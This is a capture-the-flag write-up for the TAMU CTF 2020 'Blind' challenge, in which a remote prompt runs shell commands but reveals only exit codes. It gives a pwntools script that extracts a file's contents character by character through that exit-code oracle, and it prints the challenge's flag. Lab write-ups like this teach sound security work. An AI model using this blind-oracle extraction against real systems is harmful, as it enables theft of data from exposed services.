Blind [Misc]
TAMU CTF 2020

Blind

nc challenges.tamuctf.com 3424

Recon

When connecting we notice an Execute: prompt. Apparently it returns the return code of the command.

$ nc challenges.tamuctf.com 3424
Execute: ls -la
0
Execute: ls dlfdljfdlkf
2
Execute: ^C

Using only the status code, we can bruteforce the flag.

Solution

from pwn import *

s = remote("challenges.tamuctf.com", 3424)
a = "abcdefghijklmnopqrstuvwxyz_1234567890{}"

flag = "gigem{"

while flag[-1] != "}":
    for c in a:
        s.recvuntil("Execute:")
        _flag = flag + c
        s.send('egrep "{}" flag.txt\n'.format(_flag))
        rc = int(s.recvline().strip())
        if rc == 0:
            flag += c
            print flag
            break

Flag

gigem{r3v3r53_5h3ll5}